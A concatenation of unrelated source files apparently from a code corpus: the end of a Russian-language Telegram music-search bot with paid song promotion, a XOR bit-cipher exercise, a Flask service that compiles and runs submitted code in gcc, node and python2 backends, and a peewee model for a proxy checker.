bot.send_message(message.chat.id, text="Напишите название песни", reply_markup=markup)
elif (message.text == "Профиль"):
users_step[message.from_user.id] = "user"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(profile_statistic, back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Добро пожаловать в ваш профиль".format(
message.from_user), reply_markup=markup)
elif (message.text == "Статистика"):
users_step[message.from_user.id] = "profile_statistic"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Предоставляю вашу статистику:".format(
message.from_user), reply_markup=markup)
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
make_photo = QR_Operation()
make_photo.statistic_image(user_table.user_id, user_table.listen_statistic, user_table.add_statistic, user_table.ads_statistic)
        # draw the user's statistics onto a special background image
        bot.send_photo(message.chat.id, open(f"pass/statistic-{user_table.user_id}.jpg", "rb"))
        # send the statistics image
        os.remove(f"pass/statistic-{user_table.user_id}.jpg")
        # remove the temporary files
elif (message.text == "Добавить музыку"):
users_step[message.from_user.id] = "musick_add"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Скинь сначала название, текст(можно саму. узнаваемую часть), затем фото и потом аудио в виде файла".format(
message.from_user), reply_markup=markup)
elif (message.text == "Найти музыку"):
users_step[message.from_user.id] = "musick_find"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.row(text)
markup.row(qr_button, voice)
markup.row(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Выбери формат поиска".format(message.from_user), reply_markup=markup)
elif (message.text == "Текст"):
users_step[message.from_user.id] = "text"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, Напиши название или часть текста песни".format(
message.from_user),
reply_markup=markup)
elif (message.text == "Голос"):
users_step[message.from_user.id] = "voice"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, rus, eng)
bot.send_message(message.chat.id,
text="{0.first_name}, выбери язык".format(
message.from_user),
reply_markup=markup)
elif (message.text == "QR код"):
users_step[message.from_user.id] = "qr"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, жду qr код".format(message.from_user),
reply_markup=markup)
elif (message.text == "Поделиться"):
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
db_sess = db_session.create_session()
result = db_sess.query(Song.qr).filter(Song.name == users_step[message.from_user.id]).first()
bot.send_photo(message.chat.id, open(result[0], "rb"))
    elif message.text in ("Русский", "Английский") and users_step[message.from_user.id] == "voice":  # choose the recognition language for voice search
if message.text == "Русский":
users_step[message.from_user.id] = "ru_RU"
else:
users_step[message.from_user.id] = "eng_ENG"
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button)
bot.send_message(message.chat.id,
text="{0.first_name}, жду голосовое сообщение".format(message.from_user),
reply_markup=markup)
    elif users_step[message.from_user.id] == "text":  # run the search by text
send_message(message.chat.id, message.text, message)
    elif users_step[message.from_user.id] == "schearch_for_adv":  # look up the song to advertise
db_sess = db_session.create_session()
result = list(db_sess.query(Song.photo, Song.song, Song.name).filter(Song.name == message.text).distinct())
if result:
users_step[message.from_user.id] = ["check_for_adv"] + list(result[0])
result = result[0]
requests.get(f'{URL}{__APIKEY__}/sendPhoto?chat_id={message.chat.id}&photo={result[0]}&caption={result[2]}')
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={message.chat.id}&audio={result[1]}")
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, yes)
bot.send_message(message.chat.id,
text="{0.first_name}, это то что нужно?".format(message.from_user),
reply_markup=markup)
else:
            bot.send_message(message.chat.id,  # it works, table lookup still to be finished
text="Извините, ничего не нашлось")
elif users_step[message.from_user.id][0] == "check_for_adv" and (message.text == "Да"):
musik_adv = types.LabeledPrice(label='Реклама песни', amount=10000)
if __PAYKEY__.split(':')[1] == 'TEST':
bot.send_invoice(message.chat.id, title="Оплата", description=f"Реклама среди пользователей",
provider_token=__PAYKEY__, currency="rub",
is_flexible=False,
prices=[musik_adv,],
start_parameter='payment-test', invoice_payload="payload-test"
)
    elif users_step[message.from_user.id] == "musick_add":  # state: the user has just sent the song title
        users_step[message.from_user.id] = ["musick_add-text", message.text]
    elif users_step[message.from_user.id][0] == "musick_add-text":  # state: title stored, now expecting the lyrics
users_step[message.from_user.id].append(message.text)
users_step[message.from_user.id][0] = "musick_add-image"
print(users_step)
@bot.message_handler(content_types=['voice'])
def get_voice(message):
if users_step[message.from_user.id] in ("ru_RU" ,"eng_ENG"):
file_info = bot.get_file(message.voice.file_id)
path = file_info.file_path
file_name = "pass/" + os.path.basename(path)
print(file_name)
doc = requests.get('https://api.telegram.org/file/bot{0}/{1}'.format(__APIKEY__, file_info.file_path))
with open(file_name, 'wb') as file:
file.write(doc.content)
x = Recognition(file_name, users_step[message.from_user.id])
result = x.get_audio_messages()
send_message(message.chat.id, result, message)
@bot.pre_checkout_query_handler(func=lambda query: True)  # confirm that the payment pre-checkout query arrived
def checkout(pre_checkout_query):
bot.answer_pre_checkout_query(pre_checkout_query.id, ok=True)
@bot.message_handler(content_types=['successful_payment'])  # on successful payment
def payed(message):
bot.send_message(message.chat.id, "Спасибо за покупку")
db_sess = db_session.create_session()
    result = [row[0] for row in db_sess.query(Users.user_id).distinct()]  # all user ids
names = users_step[message.from_user.id][1:]
for i in result:
requests.get(f'{URL}{__APIKEY__}/sendPhoto?chat_id={i}&photo={names[0]}&caption=Спонсорская песня: {names[2]}')
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={i}&audio={names[1]}")
@bot.message_handler(content_types=['photo'])  # triggered when a photo is sent (not as a file)
def image(message):
if message.from_user.id in users_step:
print(users_step[message.from_user.id][0])
        # make sure the user is at the right step, otherwise sending a photo in the wrong place could break things
if users_step[message.from_user.id][0] == "musick_add-image":
            file_photo_id = message.photo[-1].file_id  # get the photo id
            users_step[message.from_user.id].append(str(file_photo_id))  # store it next to the step
            users_step[message.from_user.id][0] = "musick_add-file"  # and move on to the next step
            file_info = bot.get_file(message.photo[len(message.photo) - 1].file_id)  # fetch the file info
            downloaded_file = bot.download_file(file_info.file_path)  # download it
            src = 'pass/' + file_photo_id + ".png"  # give it a name
            with open(src, 'wb') as new_file:
                new_file.write(downloaded_file)  # write it to disk
        elif users_step[message.from_user.id] == "qr":  # qr-code decoding branch (experimental)
file_info = bot.get_file(message.photo[len(message.photo) - 1].file_id)
downloaded_file = bot.download_file(file_info.file_path)
src = 'pass/' + message.photo[1].file_id + ".png"
with open(src, 'wb') as new_file:
new_file.write(downloaded_file)
dec = QR_Operation("pass/" + message.photo[1].file_id)
text_qr = dec.qr_decode()
os.remove("pass/" + message.photo[1].file_id + ".png")
db_sess = db_session.create_session()
if text_qr.isdigit():
result = list(db_sess.query(Song.gif, Song.song, Song.name).filter(Song.id == int(text_qr)).distinct())
else:
result = False
if result:
result = result[0]
bot.send_message(message.chat.id,
text=result[2].format(
message.from_user))
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={message.chat.id}&audio={result[1]}")
else:
                bot.send_message(message.chat.id,  # it works, table lookup still to be finished
text="Извините, ничего не нашлось")
@bot.message_handler(content_types=['audio'])  # triggered when audio is sent (as a file)
def doc(message):
if message.from_user.id in users_step:
if users_step[message.from_user.id][0] == "musick_add-file":
file = str(message.audio.file_id)
            mus = Song()  # here the new row for the table is built
            mus.name = users_step[message.from_user.id][1]  # see the model class file for details
mus.photo = users_step[message.from_user.id][3]
first_directory = os.getcwd()
os.chdir('gif')
gif_in_directory = os.listdir()
if len(gif_in_directory) == 0:
song_id = '1'
else:
gif_in_directory = sorted(gif_in_directory, reverse=True)
                song_id = str(int(gif_in_directory[0].split('-')[1].split('.')[0]) + 1)  # take the index of the last song and add one
os.chdir(first_directory)
image_creator = QR_Operation(f'qr-{song_id}')
            image_creator.make_gif(f'name-{song_id}', f'{users_step[message.from_user.id][-1]}')  # build the gif with the disc artwork
            print(f'name-{song_id}', f'{users_step[message.from_user.id][-1]}')
            image_creator.qr_coder(song_id)  # generate the basic qr code
            image_creator.im_to_qr(f'pass/{users_step[message.from_user.id][-1]}')  # customise it with the cover image
os.remove(f'pass/qr-{song_id}-base.png')
mus.gif = f'gif/name-{song_id}.gif'
mus.qr = f"qr/qr-{song_id}.png"
mus.song = file
mus.text = users_step[message.from_user.id][2]
mus.author = message.from_user.id
            db_sess = db_session.create_session()  # the actual session
            db_sess.add(mus)  # first add the object to the session
            db_sess.commit()  # then always commit
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
user_table.add_statistic = str(int(user_table.add_statistic) + 1)
db_sess.commit()
bot.send_message(message.chat.id,
                             text="Успешно добавлено")  # Nikita, send the gif and the qr here
def send_message(chat_id, name, message):  # send a normal reply containing the requested song
    db_sess = db_session.create_session()  # a session is required for the queries
    result = list(db_sess.query(Song.gif, Song.song).filter(Song.name == name).distinct())  # look the song up by name
    if result:  # the name was found
        result = result[0]  # the query returned a list with a single tuple
users_step[message.from_user.id] = name
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, share)
bot.send_message(message.chat.id,
text=name.format(
message.from_user), reply_markup=markup)
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={chat_id}&audio={result[1]}")
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
        user_table.listen_statistic = str(int(user_table.listen_statistic) + 1)  # update the listen counter
db_sess.commit()
else:
        song = ["", 0]  # best match so far
        result = list(db_sess.query(Song.text).distinct())  # all song lyrics
        for i in result:
            i = i[0]
            s = SequenceMatcher(lambda x: x == " ", name, i)  # measures the overlap as a ratio
            s = s.ratio()
            if s > song[1]:  # keep the maximum
song[1] = s
song[0] = i
print(song)
result = list(db_sess.query(Song.gif, Song.song, Song.name).filter(
            Song.text == song[0]).distinct())  # and fetch the rest of the record by its lyrics
if result:
result = result[0]
users_step[message.from_user.id] = result[2]
markup = types.ReplyKeyboardMarkup(resize_keyboard=True)
markup.add(back_button, share)
bot.send_message(message.chat.id,
text=f"Совпадение {round(song[1], 1) * 100}% - {result[2]}", reply_markup=markup)
bot.send_animation(message.chat.id, open(result[0], 'rb'))
requests.get(f"{URL}{__APIKEY__}/sendAudio?chat_id={chat_id}&audio={result[1]}")
db_sess = db_session.create_session()
user_table = db_sess.query(Users).filter(Users.user_id == message.from_user.id).first()
            user_table.listen_statistic = str(int(user_table.listen_statistic) + 1)  # update the listen counter
db_sess.commit()
else:
bot.send_message(message.chat.id,
                             text="Ничего не нашлось... Добавь эту песню нам в коллекцию")  # nothing was found, ask the user to add the song
def run():
    bot.polling(none_stop=True, interval=1)  # start polling; this keeps the bot running and updated
if __name__ == "__main__":
run()
``` |
{
"source": "4po/Cours",
"score": 3
} |
#### File: Python/cryptage/cryptage_bin.py
```python
def oue (a,b):
if(a != b):
return 1
else:
return 0
def Crypte(Mess,Clef):
Mcrypte = []
for i in range(len(Mess)):
Mcrypte.append(oue(Mess[i],Clef[i]))
return Mcrypte
M = [0,1,1,0,1,0,1,0,1,1,0,1,0,1,0,0]
K = [1,0,1,0,1,1,0,0,0,0,0,1,1,1,1,1]
C = Crypte(M,K)
D = Crypte(C,K)
print(M)
print(C)
print(D)
``` |
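The exercise above XORs two hard-coded bit lists; the same encrypt-twice-to-decrypt property holds for any bit string. A self-contained sketch (not part of the course file) applying the idea to ASCII text:

```python
def text_to_bits(s):
    """Convert an ASCII string into a flat list of bits (8 per character)."""
    return [(ord(ch) >> i) & 1 for ch in s for i in range(7, -1, -1)]

def bits_to_text(bits):
    """Inverse of text_to_bits."""
    return ''.join(chr(int(''.join(map(str, bits[i:i + 8])), 2))
                   for i in range(0, len(bits), 8))

def xor_bits(message, key):
    """Bitwise XOR of two equal-length bit lists (same role as Crypte above)."""
    return [a ^ b for a, b in zip(message, key)]

message = text_to_bits("HELLO")
key = text_to_bits("XMCKL")          # the key must be at least as long as the message
cipher = xor_bits(message, key)
assert bits_to_text(xor_bits(cipher, key)) == "HELLO"  # XOR with the same key twice restores the text
```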
{
"source": "4poc/rccvm",
"score": 2
} |
#### File: rccvm/rccvmd/app.py
```python
import flask
from flask import request, jsonify
from werkzeug.exceptions import default_exceptions
from werkzeug.exceptions import HTTPException
import json
import backend
# discover and import the available backends
backend.load()
runner = backend.Runner()
app = flask.Flask(__name__)
def make_json_error(ex):
response = jsonify(error=type(ex).__name__, message=str(ex))
response.status_code = (ex.code
if isinstance(ex, HTTPException)
else 500)
return response
for code in default_exceptions.iterkeys():
app.error_handler_spec[None][code] = make_json_error
# Lists all available backends.
@app.route('/backends')
def list_backends():
return jsonify(**{'backends': [{
'name': x['name'],
'description': x['description']} for x in backend.registry]})
@app.route('/execute', methods=['POST'])
def execute():
result = runner.delegate(request.get_json(force=True))
return jsonify(**result)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=5000, debug=False)
```
#### File: rccvmd/backends/gcc.py
```python
from backend import BackendBase, registry
class GCCBackend(BackendBase):
def compile(self, argv=None, env={}):
if not argv: argv = ['gcc', 'main.c']
return self.popen(argv, env)
def run(self, argv=None, env={}):
if not argv: argv = ['./a.out']
return self.popen(argv, env)
registry.append({
'name': 'gcc',
'class': GCCBackend,
'description': 'The GNU C compiler'
})
```
#### File: rccvmd/backends/javascript.py
```python
from backend import BackendBase, registry
class JavaScriptBackend(BackendBase):
def compile(self, argv=None, env={}):
pass
def run(self, argv=None, env={}):
if not argv: argv = ['node', 'main.js']
return self.popen(argv, env)
registry.append({
'name': 'javascript',
'class': JavaScriptBackend,
'description': 'nodejs'
})
```
#### File: rccvmd/backends/python2.py
```python
from backend import BackendBase, registry
class Python2Backend(BackendBase):
def compile(self, argv=None, env={}):
pass
def run(self, argv=None, env={}):
if not argv: argv = ['python2', 'main.py']
return self.popen(argv, env)
registry.append({
'name': 'python2',
'class': Python2Backend,
'description': 'the general-purpose language'
})
``` |
{
"source": "4po/proxychecker",
"score": 3
} |
#### File: 4po/proxychecker/model.py
```python
from peewee import *
from playhouse.sqlite_ext import SqliteExtDatabase
db = SqliteExtDatabase('proxy.db')
db.connect()
class BaseModel(Model):
class Meta:
database = db
class Proxy(BaseModel):
PROTOCOL_HTTP = 'http'
PROTOCOL_SOCKS5 = 'socks5'
    # transparent proxy
    TYPE_TRANSPARENT = 'transparent'
    # anonymous proxy
    TYPE_ANONYMOUS = 'anonymous'
    # elite (high-anonymity) proxy
    TYPE_ELITE = 'elite'
ip = CharField()
port = IntegerField()
protocol = CharField()
type = CharField()
    # time of the last verification
check_time = DateTimeField()
class Meta:
indexes = (
(('ip', 'port'), True),
)
def create():
db.create_tables([Proxy])
``` |
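A short usage sketch for the model above (the address, port and timestamp are placeholders; only standard peewee calls are used):

```python
import datetime

from model import create, Proxy

create()  # create the table on first run
Proxy.create(ip='127.0.0.1', port=8080,
             protocol=Proxy.PROTOCOL_HTTP, type=Proxy.TYPE_ELITE,
             check_time=datetime.datetime.now())

# All elite HTTP proxies, most recently checked first.
query = (Proxy.select()
         .where((Proxy.protocol == Proxy.PROTOCOL_HTTP) & (Proxy.type == Proxy.TYPE_ELITE))
         .order_by(Proxy.check_time.desc()))
for p in query:
    print(p.ip, p.port)
```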